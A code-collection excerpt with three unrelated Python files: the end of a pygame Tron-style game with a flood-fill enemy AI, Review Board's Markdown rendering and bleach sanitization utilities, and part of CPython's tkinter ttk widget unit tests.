    @param height: number of playable rows; defaults to the module-level
        block_height.
    """
    if width is None:
        width = block_width
    if height is None:
        height = block_height
    board = [[0 for k in range(0, width + 2)] for j in range(0, height + 2)]
    # Top and bottom border rows.
    for i in range(0, width + 2):
        board[0][i] = 2
        board[height + 1][i] = 2
    # Left and right border columns (the bottom row is already fully walled
    # by the loop above, so stopping at height is sufficient).
    for i in range(0, height + 1):
        board[i][0] = 2
        board[i][width + 1] = 2
    return board
def reset(drivers, overseer):
    """Put both drivers back at their start positions and clear their trails.

    Used after crashes and the like. Assumes drivers[0] is the user and
    drivers[1] is the enemy.
    NOTE(review): ``overseer`` is accepted but currently unused here.
    """
    drivers[0].reset(user_start_x, user_start_y, user_dir, user_image)
    drivers[1].reset(enemy1_start_x, enemy1_start_y, enemy1_dir, enemy1_image)
    for driver in drivers:
        del driver.driver_trail[:]
def normalize_x(x):
    # This gets an x pixel value and finds its corresponding value in the
    # array (grid column). Python 2 integer division floors to an int index.
    return ((x - board_x) / 15)
def normalize_y(y):
    # This gets a y pixel value and finds its corresponding value in the
    # array (grid row). Python 2 integer division floors to an int index.
    return ((y - board_y) / 15)
def makeBrick(driver):
    """Lay a new trail brick at the driver's position and return its cell.

    Every time, it checks this brick against each existing brick in the
    trail in order to update which sides now touch a neighbor — this is
    the logic that makes the driver's tail render as one fused line.
    Returns the (column, row) grid coordinates of the new brick.
    """
    new_brick = Brick(driver.rect.left, driver.rect.top, driver.color, driver.brickimage)
    driver_trail = driver.driver_trail
    for ibrick in driver_trail:
        # Redraw each existing brick while we're walking the trail anyway.
        ibrick.update_draw()
        if new_brick.rect.top == ibrick.rect.top:
            if new_brick.rect.left == ibrick.rect.left - 15:
                new_brick.right = True
                ibrick.left = True
            if new_brick.rect.left == ibrick.rect.left + 15:
                new_brick.left = True
                ibrick.right = True
        if new_brick.rect.left == ibrick.rect.left:
            if new_brick.rect.top == ibrick.rect.top - 15:
                new_brick.bottom = True
                ibrick.top = True
            if new_brick.rect.top == ibrick.rect.top + 15:
                new_brick.top = True
                ibrick.bottom = True
    # After checking if the new brick is touching any others, it adds it to
    # the tail.
    driver_trail.append(new_brick)
    # It also returns its normalized location to remove it from the graph
    return normalize_x(new_brick.rect.left), normalize_y(new_brick.rect.top)
def update_board(drivers, overseer, g):
    """Advance one game tick: draw, collision-check, lay bricks, run the AI.

    Returns False when any driver crashed (round over), True otherwise.
    drivers[0] is assumed to be the human player; all others get AI moves.
    NOTE(review): ``overseer`` and the local ``free_path`` are currently
    unused in this function.
    """
    # Start with a clear screen
    screen.fill(BLACK)
    draw_board()
    driver_block_x = 0
    driver_block_y = 0
    for driver in drivers:
        wall_up, wall_right, wall_down, wall_left = (False,) * 4
        # Checks if the drivers hit each other, it will score as a tie
        for driver2 in drivers:
            if driver2 != driver:
                if pygame.sprite.collide_rect(driver, driver2):
                    return False
        # Gets its normalized location for the graph
        update_driver_y = normalize_y(driver.rect.top)
        update_driver_x = normalize_x(driver.rect.left)
        # If the node has been removed (meaning it's a wall)
        # Then the driver crashes and the game resets
        if (update_driver_y, update_driver_x) not in g.graph_dict:
            return False
        # Adds the brick
        added_brick_x, added_brick_y = makeBrick(driver)
        if driver != drivers[0]:
            g.remove_node(added_brick_y, added_brick_x)
        else:
            # The user's cell is only removed after the loop (see below),
            # so the AI can still see it as occupied-by-user this tick.
            driver_block_y = added_brick_y
            driver_block_x = added_brick_x
        # If the driver isn't the user, then add some ai
        if drivers[0] != driver:
            g.copy_graph()
            free_path = True
            user_x = normalize_x(drivers[0].rect.left)
            user_y = normalize_y(drivers[0].rect.top)
            # Python 2 integer division: apart is a whole-cell radius.
            apart = ((abs(user_x - update_driver_x) + abs(user_y - update_driver_y)) / 2)
            if (user_x - update_driver_x) != 0 and (user_y - update_driver_y) != 0:
                apart += 4
            # Almost too hard to explain this part in comments but basically
            # this is what makes the imaginary wall in front of the driver
            # the reason that it checks if the driver is close is to fix a
            # specific use case that will be too hard to explain in comments
            g.remove_next_moves(apart, user_y, user_x)
            # Checks which sides have walls on them
            if (update_driver_y - 1, update_driver_x) not in g.future_graph:
                wall_up = True
            if (update_driver_y, update_driver_x + 1) not in g.future_graph:
                wall_right = True
            if (update_driver_y + 1, update_driver_x) not in g.future_graph:
                wall_down = True
            if (update_driver_y, update_driver_x - 1) not in g.future_graph:
                wall_left = True
            # The flood variables initialized
            flood_up, flood_right, flood_down, flood_left = (0,)*4
            # Checks how many open spaces are on each side of the driver
            if not wall_up:
                flood_up = g.get_path_size(update_driver_y - 1, update_driver_x)
            if not wall_right:
                flood_right = g.get_path_size(update_driver_y, update_driver_x + 1)
            if not wall_down:
                flood_down = g.get_path_size(update_driver_y + 1, update_driver_x)
            if not wall_left:
                flood_left = g.get_path_size(update_driver_y, update_driver_x - 1)
            # Finds the most efficient turn and walls up the other sides
            if flood_up > flood_right and flood_up > flood_left:
                wall_left = True
                wall_right = True
                if flood_up > flood_down:
                    wall_down = True
            if flood_down > flood_right and flood_down > flood_left:
                wall_left = True
                wall_right = True
                if flood_down > flood_up:
                    wall_up = True
            if flood_left > flood_down and flood_left > flood_up:
                wall_up = True
                wall_down = True
                if flood_left > flood_right:
                    wall_right = True
            if flood_right > flood_down and flood_right > flood_up:
                wall_up = True
                wall_down = True
                if flood_right > flood_left:
                    wall_left = True
            # Moves the enemy drivers. When the forward cell is (virtually)
            # walled, turn away from the blocked side; if both turns are
            # open, pick one at random. (Python 2 print statements trace
            # the flood counts and the chosen move for debugging.)
            if wall_up and driver.dir == 0:
                flooding = "{}, {}, {}, {}".format(flood_up, flood_right, flood_down, flood_left)
                print flooding
                if wall_left:
                    print "upleft"
                    driver.right()
                elif wall_right:
                    print "upright"
                    driver.left()
                else:
                    print "up"
                    if bool(random.getrandbits(1)):
                        driver.right()
                    else:
                        driver.left()
            if wall_right and driver.dir == 1:
                flooding = "{}, {}, {}, {}".format(flood_up, flood_right, flood_down, flood_left)
                print flooding
                if wall_up:
                    print "rightup"
                    driver.down()
                elif wall_down:
                    print "rightdown"
                    driver.up()
                else:
                    print "right"
                    if bool(random.getrandbits(1)):
                        driver.down()
                    else:
                        driver.up()
            if wall_down and driver.dir == 2:
                flooding = "{}, {}, {}, {}".format(flood_up, flood_right, flood_down, flood_left)
                print flooding
                if wall_left:
                    print "downleft"
                    driver.right()
                elif wall_right:
                    print "downright"
                    driver.left()
                else:
                    print "down"
                    if bool(random.getrandbits(1)):
                        driver.right()
                    else:
                        driver.left()
            if wall_left and driver.dir == 3:
                flooding = "{}, {}, {}, {}".format(flood_up, flood_right, flood_down, flood_left)
                print flooding
                if wall_up:
                    print "leftup"
                    driver.down()
                elif wall_down:
                    print "leftdown"
                    driver.up()
                else:
                    print "left"
                    if bool(random.getrandbits(1)):
                        driver.down()
                    else:
                        driver.up()
        driver.update_draw()
    # Now that every AI has moved, retire the user's cell from the graph.
    g.remove_node(driver_block_y, driver_block_x)
    pygame.display.flip()
    return True
def keyCheck(key_pressed, user):
    """Translate a pressed key into the driver's turn method, or None.

    The caller queues the returned bound method and pops it on the next
    game tick, so keys pressed faster than the tick rate are not lost.
    A turn is refused when it would reverse straight into the tail
    (e.g. pressing up while heading down).
    """
    # Arrow-key codes mapped to (turn method, heading that forbids it);
    # dir encoding is 0=up, 1=right, 2=down, 3=left.
    bindings = {
        273: (user.up, 2),
        275: (user.right, 3),
        274: (user.down, 0),
        276: (user.left, 1),
    }
    binding = bindings.get(key_pressed)
    if binding is not None:
        action, opposite_heading = binding
        if user.dir != opposite_heading:
            return action
    return None
def main():
    """Run the PYTRON game loop until the window is closed."""
    # Initialize user and game
    user = Driver(user_start_x, user_start_y, user_dir, user_image, user_color, user_brick)
    enemy1 = Driver(enemy1_start_x, enemy1_start_y, enemy1_dir, enemy1_image, enemy1_color, enemy1_brick)
    drivers = []
    gameOn = True
    overseer = Overseer()
    # Initiate drivers (index 0 must be the user; update_board relies on it)
    drivers.append(user)
    drivers.append(enemy1)
    # Make graph of board
    g = Graph()
    # Allows you to press keys in sequence faster than the game ticks
    # So that it will pop the next command when needed
    keys_pressed = []
    while gameOn:
        clock.tick(50)
        # The actual while loop that runs the game
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                gameOn = False
            if event.type == pygame.KEYDOWN:
                key_checked = keyCheck(event.key, user)
                if key_checked:
                    keys_pressed.insert(0, key_checked)
            if event.type == move:
                # If there are any keys added to the queue, it pops them
                # and then runs them (the popped value is a bound method).
                if keys_pressed:
                    keys_pressed.pop()()
                for driver in drivers:
                    driver.move()
                if not update_board(drivers, overseer, g):
                    # Someone crashed: restart the round with a fresh graph
                    # and drop any queued turns.
                    reset(drivers, overseer)
                    g.generate_new_graph()
                    keys_pressed = []
    pygame.quit()
if __name__ == "__main__":
main()
|
chipx86/reviewboard | refs/heads/master | reviewboard/reviews/markdown_utils.py | 1 | from __future__ import unicode_literals
import warnings
import pymdownx.emoji
from bleach.sanitizer import Cleaner
from django.core.exceptions import ObjectDoesNotExist
from django.db.models import Model
from django.utils.encoding import force_text
from django.utils.html import escape
from djblets import markdown as djblets_markdown
from djblets.siteconfig.models import SiteConfiguration
from markdown import markdown
# Keyword arguments used when calling a Markdown renderer function.
#
# We use XHTML1 instead of HTML5 to ensure the results can be parsed by an
# XML parser, needed for change descriptions and other parts of the web UI.
MARKDOWN_KWARGS = {
    # Markdown's attr_list-style attributes are disabled to avoid letting
    # authors inject arbitrary HTML attributes.
    'enable_attributes': False,
    'output_format': 'xhtml1',
    'lazy_ol': False,
    'extensions': [
        'markdown.extensions.fenced_code',
        'markdown.extensions.codehilite',
        'markdown.extensions.sane_lists',
        'markdown.extensions.tables',
        'markdown.extensions.nl2br',
        'pymdownx.tilde',
        'pymdownx.emoji',
        'djblets.markdown.extensions.escape_html',
        'djblets.markdown.extensions.wysiwyg',
    ],
    'extension_configs': {
        'markdown.extensions.codehilite': {
            'guess_lang': False,
        },
        'pymdownx.emoji': {
            # GitHub's gemoji index, with images served from GitHub's CDN.
            'emoji_index': pymdownx.emoji.gemoji,
            'options': {
                'classes': 'emoji',
                'image_path': ('https://github.githubassets.com/images/icons/'
                               'emoji/unicode/'),
                'non_standard_image_path': ('https://github.githubassets.com/'
                                            'images/icons/emoji/'),
            },
        },
    },
}
#: A list of HTML tags considered to be safe in Markdown-generated output.
#:
#: Anything not in this list will be escaped when sanitizing the resulting
#: HTML.
#:
#: Version Added:
#: 3.0.22
SAFE_MARKDOWN_TAGS = [
    'a',
    'b',
    'blockquote',
    'br',
    'code',
    'dd',
    'del',
    'div',
    'dt',
    'em',
    'h1',
    'h2',
    'h3',
    'h4',
    'h5',
    'h6',
    'hr',
    'i',
    'img',
    'li',
    'ol',
    'p',
    'pre',
    'span',
    'strong',
    'sub',
    'sup',
    'table',
    'tbody',
    'td',
    # Fixed: 'foot' is not an HTML element; the table footer tag is 'tfoot'.
    # Without it, bleach escaped <tfoot> in rendered Markdown tables.
    'tfoot',
    'th',
    'thead',
    'tr',
    'tt',
    'ul',
]
#: Mappings of HTML tags to attributes considered to be safe for Markdown.
#:
#: Anything not in this list will be removed when sanitizing the resulting
#: HTML.
#:
#: Version Added:
#: 3.0.22
# Maps a tag name (or the '*' wildcard for all tags) to its allowed
# attribute names; everything else is stripped by bleach.
SAFE_MARKDOWN_ATTRS = {
    '*': ['class', 'id'],
    'a': ['href', 'alt', 'title'],
    'img': ['src', 'alt', 'title'],
}
def markdown_escape_field(obj, field_name):
    """Escape Markdown text stored in a field of a model or dictionary.

    Convenience wrapper around djblets' markdown_escape that writes the
    escaped value back in place on either a model attribute or a dict key.
    """
    if isinstance(obj, Model):
        escaped = djblets_markdown.markdown_escape(getattr(obj, field_name))
        setattr(obj, field_name, escaped)
    elif isinstance(obj, dict):
        obj[field_name] = djblets_markdown.markdown_escape(obj[field_name])
    else:
        raise TypeError('Unexpected type %r passed to markdown_escape_field'
                        % obj)
def markdown_unescape_field(obj, field_name):
    """Unescape Markdown text stored in a field of a model or dictionary.

    Convenience wrapper around djblets' markdown_unescape that writes the
    unescaped value back in place on either a model attribute or a dict key.
    """
    if isinstance(obj, Model):
        unescaped = djblets_markdown.markdown_unescape(getattr(obj, field_name))
        setattr(obj, field_name, unescaped)
    elif isinstance(obj, dict):
        obj[field_name] = djblets_markdown.markdown_unescape(obj[field_name])
    else:
        raise TypeError('Unexpected type %r passed to markdown_unescape_field'
                        % obj)
def normalize_text_for_edit(user, text, rich_text, escape_html=True):
    """Normalize stored text so it can be loaded into an editor.

    If the stored text is plain but the user edits in Markdown by default,
    the text is Markdown-escaped first so it round-trips unchanged. The
    result is additionally HTML-escaped unless escape_html is False.
    """
    if text is None:
        return ''

    needs_markdown_escaping = (not rich_text and
                               is_rich_text_default_for_user(user))
    if needs_markdown_escaping:
        # This isn't rich text, but it's going to be edited as rich text,
        # so escape it.
        text = djblets_markdown.markdown_escape(text)

    if escape_html:
        text = escape(text)

    return text
def markdown_render_conditional(text, rich_text):
    """Return HTML for text, rendering Markdown only when rich_text is set.

    Plain text is simply HTML-escaped instead of being run through the
    Markdown renderer.
    """
    return render_markdown(text) if rich_text else escape(text)
def is_rich_text_default_for_user(user):
    """Return whether this user edits text as Markdown by default.

    The user's profile preference wins when available; otherwise the
    site-wide default is used.
    """
    if user.is_authenticated():
        try:
            profile = user.get_profile()
            return profile.should_use_rich_text
        except ObjectDoesNotExist:
            pass

    # Anonymous user or missing profile: fall back to the site default.
    siteconfig = SiteConfiguration.objects.get_current()
    return siteconfig.get('default_use_rich_text')
def markdown_set_field_escaped(obj, field, escaped):
    """Escape or unescape the given field of a model or dictionary in place."""
    handler = markdown_escape_field if escaped else markdown_unescape_field
    handler(obj, field)
def render_markdown(text):
    """Render Markdown text to sanitized XHTML.

    The rendered output is run through bleach to strip custom HTML and
    dangerous links, keeping only SAFE_MARKDOWN_TAGS/SAFE_MARKDOWN_ATTRS.
    XHTML is used so the element tree can be parsed for code review and
    change description diffing.

    Args:
        text (bytes or unicode):
            The Markdown text to render.

            If this is a byte string, it must represent UTF-8-encoded text.

    Returns:
        unicode:
        The Markdown-rendered XHTML.
    """
    rendered = markdown(force_text(text), **MARKDOWN_KWARGS)

    # Sanitize with bleach. The html5lib serializer it wraps is switched to
    # self-closing tags (<br/>) so Djblets can re-parse the result as XML
    # for things like Markdown diffing.
    cleaner = Cleaner(tags=SAFE_MARKDOWN_TAGS,
                      attributes=SAFE_MARKDOWN_ATTRS)
    cleaner.serializer.use_trailing_solidus = True

    return cleaner.clean(rendered)
def render_markdown_from_file(f):
    """Render Markdown read from a file object to HTML.

    Delegates to djblets with the same renderer settings used by
    render_markdown, which sanitize custom HTML and enable the code
    highlighting and sane-list plugins.
    """
    return djblets_markdown.render_markdown_from_file(f, **MARKDOWN_KWARGS)
|
michalliu/OpenWrt-Firefly-Libraries | refs/heads/master | staging_dir/target-mipsel_1004kc+dsp_uClibc-0.9.33.2/usr/lib/python3.4/tkinter/test/test_ttk/test_widgets.py | 8 | import unittest
import tkinter
from tkinter import ttk, TclError
from test.support import requires
import sys
from tkinter.test.test_ttk.test_functions import MockTclObj
from tkinter.test.support import (AbstractTkTest, tcl_version, get_tk_patchlevel,
simulate_mouse_click)
from tkinter.test.widget_tests import (add_standard_options, noconv,
AbstractWidgetTest, StandardOptionsTests, IntegerSizeTests, PixelSizeTests,
setUpModule)
requires('gui')
class StandardTtkOptionsTests(StandardOptionsTests):
    """Option tests shared by all ttk widgets ('class', 'padding', 'style')."""

    def test_class(self):
        widget = self.create()
        self.assertEqual(widget['class'], '')
        # 'class' is read-only after creation; only the error's casing
        # differs across Tk versions.
        errmsg='attempt to change read-only option'
        if get_tk_patchlevel() < (8, 6, 0):  # actually this was changed in 8.6b3
            errmsg='Attempt to change read-only option'
        self.checkInvalidParam(widget, 'class', 'Foo', errmsg=errmsg)
        # It can only be set at construction time, via class_=.
        widget2 = self.create(class_='Foo')
        self.assertEqual(widget2['class'], 'Foo')

    def test_padding(self):
        widget = self.create()
        # Padding accepts 1-4 values and normalizes them to string tuples.
        self.checkParam(widget, 'padding', 0, expected=('0',))
        self.checkParam(widget, 'padding', 5, expected=('5',))
        self.checkParam(widget, 'padding', (5, 6), expected=('5', '6'))
        self.checkParam(widget, 'padding', (5, 6, 7),
                        expected=('5', '6', '7'))
        self.checkParam(widget, 'padding', (5, 6, 7, 8),
                        expected=('5', '6', '7', '8'))
        self.checkParam(widget, 'padding', ('5p', '6p', '7p', '8p'))
        self.checkParam(widget, 'padding', (), expected='')

    def test_style(self):
        widget = self.create()
        self.assertEqual(widget['style'], '')
        # Oriented widgets prefix the layout name with the orientation.
        errmsg = 'Layout Foo not found'
        if hasattr(self, 'default_orient'):
            errmsg = ('Layout %s.Foo not found' %
                      getattr(self, 'default_orient').title())
        self.checkInvalidParam(widget, 'style', 'Foo',
                               errmsg=errmsg)
        widget2 = self.create(class_='Foo')
        self.assertEqual(widget2['class'], 'Foo')
        # XXX
        pass
class WidgetTest(AbstractTkTest, unittest.TestCase):
    """Tests methods available in every ttk widget."""

    def setUp(self):
        super().setUp()
        # width=0 lets the button size itself to its text.
        self.widget = ttk.Button(self.root, width=0, text="Text")
        self.widget.pack()
        self.widget.wait_visibility()

    def test_identify(self):
        self.widget.update_idletasks()
        # The button's center must be identified as its "label" element;
        # coordinates outside the widget identify as the empty string.
        self.assertEqual(self.widget.identify(
            int(self.widget.winfo_width() / 2),
            int(self.widget.winfo_height() / 2)
            ), "label")
        self.assertEqual(self.widget.identify(-1, -1), "")
        # Non-integer coordinates are rejected at the Tcl level.
        self.assertRaises(tkinter.TclError, self.widget.identify, None, 5)
        self.assertRaises(tkinter.TclError, self.widget.identify, 5, None)
        self.assertRaises(tkinter.TclError, self.widget.identify, 5, '')

    def test_widget_state(self):
        # XXX not sure about the portability of all these tests
        self.assertEqual(self.widget.state(), ())
        self.assertEqual(self.widget.instate(['!disabled']), True)

        # changing from !disabled to disabled
        self.assertEqual(self.widget.state(['disabled']), ('!disabled', ))

        # no state change
        self.assertEqual(self.widget.state(['disabled']), ())

        # change back to !disable but also active
        self.assertEqual(self.widget.state(['!disabled', 'active']),
                         ('!active', 'disabled'))

        # no state changes, again
        self.assertEqual(self.widget.state(['!disabled', 'active']), ())
        self.assertEqual(self.widget.state(['active', '!disabled']), ())

        def test_cb(arg1, **kw):
            return arg1, kw
        # instate() forwards extra arguments to the callback when the
        # state spec matches.
        self.assertEqual(self.widget.instate(['!disabled'],
            test_cb, "hi", **{"msg": "there"}),
            ('hi', {'msg': 'there'}))

        # attempt to set invalid statespec
        currstate = self.widget.state()
        self.assertRaises(tkinter.TclError, self.widget.instate,
                          ['badstate'])
        self.assertRaises(tkinter.TclError, self.widget.instate,
                          ['disabled', 'badstate'])
        # verify that widget didn't change its state
        self.assertEqual(currstate, self.widget.state())

        # ensuring that passing None as state doesn't modify current state
        self.widget.state(['active', '!disabled'])
        self.assertEqual(self.widget.state(), ('active', ))
class AbstractToplevelTest(AbstractWidgetTest, PixelSizeTests):
    # Toplevel-like ttk widgets report pixel sizes as-is; skip conversion.
    _conv_pixels = noconv
@add_standard_options(StandardTtkOptionsTests)
class FrameTest(AbstractToplevelTest, unittest.TestCase):
    # Option names checked by the generated standard-option tests.
    OPTIONS = (
        'borderwidth', 'class', 'cursor', 'height',
        'padding', 'relief', 'style', 'takefocus',
        'width',
    )

    def create(self, **kwargs):
        return ttk.Frame(self.root, **kwargs)
@add_standard_options(StandardTtkOptionsTests)
class LabelFrameTest(AbstractToplevelTest, unittest.TestCase):
    OPTIONS = (
        'borderwidth', 'class', 'cursor', 'height',
        'labelanchor', 'labelwidget',
        'padding', 'relief', 'style', 'takefocus',
        'text', 'underline', 'width',
    )

    def create(self, **kwargs):
        return ttk.LabelFrame(self.root, **kwargs)

    def test_labelanchor(self):
        widget = self.create()
        # Valid anchors are compass points and two-letter combinations;
        # 'center' (valid for plain anchors) is rejected here.
        self.checkEnumParam(widget, 'labelanchor',
            'e', 'en', 'es', 'n', 'ne', 'nw', 's', 'se', 'sw', 'w', 'wn', 'ws',
            errmsg='Bad label anchor specification {}')
        self.checkInvalidParam(widget, 'labelanchor', 'center')

    def test_labelwidget(self):
        widget = self.create()
        # The option stores the widget's Tk path name, not the object.
        label = ttk.Label(self.root, text='Mupp', name='foo')
        self.checkParam(widget, 'labelwidget', label, expected='.foo')
        label.destroy()
class AbstractLabelTest(AbstractWidgetTest):
    """Shared checks for label-like ttk widgets (Label, Button, etc.)."""

    def checkImageParam(self, widget, name):
        """Check an image-valued option in widget, string, tuple and
        statespec forms, plus the error for a nonexistent image."""
        image = tkinter.PhotoImage(master=self.root, name='image1')
        image2 = tkinter.PhotoImage(master=self.root, name='image2')
        self.checkParam(widget, name, image, expected=('image1',))
        self.checkParam(widget, name, 'image1', expected=('image1',))
        self.checkParam(widget, name, (image,), expected=('image1',))
        self.checkParam(widget, name, (image, 'active', image2),
                        expected=('image1', 'active', 'image2'))
        self.checkParam(widget, name, 'image1 active image2',
                        expected=('image1', 'active', 'image2'))
        self.checkInvalidParam(widget, name, 'spam',
                errmsg='image "spam" doesn\'t exist')

    def test_compound(self):
        widget = self.create()
        self.checkEnumParam(widget, 'compound',
                'none', 'text', 'image', 'center',
                'top', 'bottom', 'left', 'right')

    def test_state(self):
        widget = self.create()
        self.checkParams(widget, 'state', 'active', 'disabled', 'normal')

    def test_width(self):
        widget = self.create()
        self.checkParams(widget, 'width', 402, -402, 0)
@add_standard_options(StandardTtkOptionsTests)
class LabelTest(AbstractLabelTest, unittest.TestCase):
    """Tests for ttk.Label."""

    OPTIONS = (
        'anchor', 'background',
        'class', 'compound', 'cursor', 'font', 'foreground',
        'image', 'justify', 'padding', 'relief', 'state', 'style',
        'takefocus', 'text', 'textvariable',
        'underline', 'width', 'wraplength',
    )
    # Pixel options are reported unconverted for ttk.Label.
    _conv_pixels = noconv

    def create(self, **kwargs):
        """Return a ttk.Label created under the test root."""
        return ttk.Label(self.root, **kwargs)

    def test_font(self):
        """'font' accepts an XLFD font specification."""
        widget = self.create()
        self.checkParam(widget, 'font',
                        '-Adobe-Helvetica-Medium-R-Normal--*-120-*-*-*-*-*-*')
@add_standard_options(StandardTtkOptionsTests)
class ButtonTest(AbstractLabelTest, unittest.TestCase):
    """Tests for ttk.Button."""

    OPTIONS = (
        'class', 'command', 'compound', 'cursor', 'default',
        'image', 'state', 'style', 'takefocus', 'text', 'textvariable',
        'underline', 'width',
    )

    def create(self, **kwargs):
        """Return a ttk.Button created under the test root."""
        return ttk.Button(self.root, **kwargs)

    def test_default(self):
        widget = self.create()
        self.checkEnumParam(widget, 'default', 'normal', 'active', 'disabled')

    def test_invoke(self):
        """invoke() runs the button's command callback."""
        success = []
        btn = ttk.Button(self.root, command=lambda: success.append(1))
        btn.invoke()
        self.assertTrue(success)
@add_standard_options(StandardTtkOptionsTests)
class CheckbuttonTest(AbstractLabelTest, unittest.TestCase):
    """Tests for ttk.Checkbutton."""

    OPTIONS = (
        'class', 'command', 'compound', 'cursor',
        'image',
        'offvalue', 'onvalue',
        'state', 'style',
        'takefocus', 'text', 'textvariable',
        'underline', 'variable', 'width',
    )

    def create(self, **kwargs):
        """Return a ttk.Checkbutton created under the test root."""
        return ttk.Checkbutton(self.root, **kwargs)

    def test_offvalue(self):
        widget = self.create()
        self.checkParams(widget, 'offvalue', 1, 2.3, '', 'any string')

    def test_onvalue(self):
        widget = self.create()
        self.checkParams(widget, 'onvalue', 1, 2.3, '', 'any string')

    def test_invoke(self):
        """invoke() toggles the linked variable and runs the command;
        with an empty command it still toggles but returns ''."""
        success = []
        def cb_test():
            success.append(1)
            return "cb test called"
        cbtn = ttk.Checkbutton(self.root, command=cb_test)
        # the variable automatically created by ttk.Checkbutton is actually
        # undefined till we invoke the Checkbutton
        self.assertEqual(cbtn.state(), ('alternate', ))
        self.assertRaises(tkinter.TclError, cbtn.tk.globalgetvar,
            cbtn['variable'])
        res = cbtn.invoke()
        self.assertEqual(res, "cb test called")
        self.assertEqual(cbtn['onvalue'],
            cbtn.tk.globalgetvar(cbtn['variable']))
        self.assertTrue(success)
        # an empty command: invoke still toggles to offvalue but the
        # callback is not run again
        cbtn['command'] = ''
        res = cbtn.invoke()
        self.assertFalse(str(res))
        self.assertLessEqual(len(success), 1)
        self.assertEqual(cbtn['offvalue'],
            cbtn.tk.globalgetvar(cbtn['variable']))
@add_standard_options(IntegerSizeTests, StandardTtkOptionsTests)
class ComboboxTest(AbstractWidgetTest, unittest.TestCase):
    """Tests for ttk.Combobox."""

    OPTIONS = (
        'class', 'cursor', 'exportselection', 'height',
        'justify', 'postcommand', 'state', 'style',
        'takefocus', 'textvariable', 'values', 'width',
    )

    def setUp(self):
        super().setUp()
        # A fresh combobox used by the interaction tests below.
        self.combo = self.create()

    def create(self, **kwargs):
        """Return a ttk.Combobox created under the test root."""
        return ttk.Combobox(self.root, **kwargs)

    def test_height(self):
        widget = self.create()
        self.checkParams(widget, 'height', 100, 101.2, 102.6, -100, 0, '1i')

    def test_state(self):
        widget = self.create()
        self.checkParams(widget, 'state', 'active', 'disabled', 'normal')

    def _show_drop_down_listbox(self):
        """Simulate a click on the combobox arrow to post the listbox."""
        width = self.combo.winfo_width()
        self.combo.event_generate('<ButtonPress-1>', x=width - 5, y=5)
        self.combo.event_generate('<ButtonRelease-1>', x=width - 5, y=5)
        self.combo.update_idletasks()

    def test_virtual_event(self):
        """Selecting an entry fires <<ComboboxSelected>>."""
        success = []
        self.combo['values'] = [1]
        self.combo.bind('<<ComboboxSelected>>',
            lambda evt: success.append(True))
        self.combo.pack()
        self.combo.wait_visibility()
        # NOTE(review): 'height' is unused — presumably a leftover from an
        # earlier geometry check; confirm before removing.
        height = self.combo.winfo_height()
        self._show_drop_down_listbox()
        self.combo.update()
        self.combo.event_generate('<Return>')
        self.combo.update()
        self.assertTrue(success)

    def test_postcommand(self):
        """'postcommand' runs when the dropdown is posted; clearing it
        stops the callback."""
        success = []
        self.combo['postcommand'] = lambda: success.append(True)
        self.combo.pack()
        self.combo.wait_visibility()
        self._show_drop_down_listbox()
        self.assertTrue(success)
        # testing postcommand removal
        self.combo['postcommand'] = ''
        self._show_drop_down_listbox()
        self.assertEqual(len(success), 1)

    def test_values(self):
        """Exercise 'values': string/tuple forms, empty strings, spaces,
        Tcl special characters, and current()/set() interaction."""
        def check_get_current(getval, currval):
            self.assertEqual(self.combo.get(), getval)
            self.assertEqual(self.combo.current(), currval)
        self.assertEqual(self.combo['values'],
                         () if tcl_version < (8, 5) else '')
        check_get_current('', -1)
        self.checkParam(self.combo, 'values', 'mon tue wed thur',
                        expected=('mon', 'tue', 'wed', 'thur'))
        self.checkParam(self.combo, 'values', ('mon', 'tue', 'wed', 'thur'))
        self.checkParam(self.combo, 'values', (42, 3.14, '', 'any string'))
        self.checkParam(self.combo, 'values', '', expected=())
        self.combo['values'] = ['a', 1, 'c']
        self.combo.set('c')
        check_get_current('c', 2)
        self.combo.current(0)
        check_get_current('a', 0)
        self.combo.set('d')
        check_get_current('d', -1)
        # testing values with empty string
        self.combo.set('')
        self.combo['values'] = (1, 2, '', 3)
        check_get_current('', 2)
        # testing values with empty string set through configure
        self.combo.configure(values=[1, '', 2])
        self.assertEqual(self.combo['values'],
                         ('1', '', '2') if self.wantobjects else
                         '1 {} 2')
        # testing values with spaces
        self.combo['values'] = ['a b', 'a\tb', 'a\nb']
        self.assertEqual(self.combo['values'],
                         ('a b', 'a\tb', 'a\nb') if self.wantobjects else
                         '{a b} {a\tb} {a\nb}')
        # testing values with special characters
        self.combo['values'] = [r'a\tb', '"a"', '} {']
        self.assertEqual(self.combo['values'],
                         (r'a\tb', '"a"', '} {') if self.wantobjects else
                         r'a\\tb {"a"} \}\ \{')
        # out of range
        self.assertRaises(tkinter.TclError, self.combo.current,
                          len(self.combo['values']))
        # it expects an integer (or something that can be converted to int)
        self.assertRaises(tkinter.TclError, self.combo.current, '')
        # testing creating combobox with empty string in values
        combo2 = ttk.Combobox(self.root, values=[1, 2, ''])
        self.assertEqual(combo2['values'],
                         ('1', '2', '') if self.wantobjects else '1 2 {}')
        combo2.destroy()
@add_standard_options(IntegerSizeTests, StandardTtkOptionsTests)
class EntryTest(AbstractWidgetTest, unittest.TestCase):
    """Tests for ttk.Entry."""

    OPTIONS = (
        'background', 'class', 'cursor',
        'exportselection', 'font',
        'invalidcommand', 'justify',
        'show', 'state', 'style', 'takefocus', 'textvariable',
        'validate', 'validatecommand', 'width', 'xscrollcommand',
    )

    def setUp(self):
        super().setUp()
        # A fresh entry used by the interaction tests below.
        self.entry = self.create()

    def create(self, **kwargs):
        """Return a ttk.Entry created under the test root."""
        return ttk.Entry(self.root, **kwargs)

    def test_invalidcommand(self):
        widget = self.create()
        self.checkCommandParam(widget, 'invalidcommand')

    def test_show(self):
        widget = self.create()
        self.checkParam(widget, 'show', '*')
        self.checkParam(widget, 'show', '')
        self.checkParam(widget, 'show', ' ')

    def test_state(self):
        widget = self.create()
        self.checkParams(widget, 'state',
                         'disabled', 'normal', 'readonly')

    def test_validate(self):
        widget = self.create()
        self.checkEnumParam(widget, 'validate',
                'all', 'key', 'focus', 'focusin', 'focusout', 'none')

    def test_validatecommand(self):
        widget = self.create()
        self.checkCommandParam(widget, 'validatecommand')

    def test_bbox(self):
        """bbox() returns a bounding box for a valid index and raises
        TclError for bad indices."""
        self.assertIsBoundingBox(self.entry.bbox(0))
        self.assertRaises(tkinter.TclError, self.entry.bbox, 'noindex')
        self.assertRaises(tkinter.TclError, self.entry.bbox, None)

    def test_identify(self):
        """identify() maps coordinates to element names ('' outside)."""
        self.entry.pack()
        self.entry.wait_visibility()
        self.entry.update_idletasks()
        self.assertEqual(self.entry.identify(5, 5), "textarea")
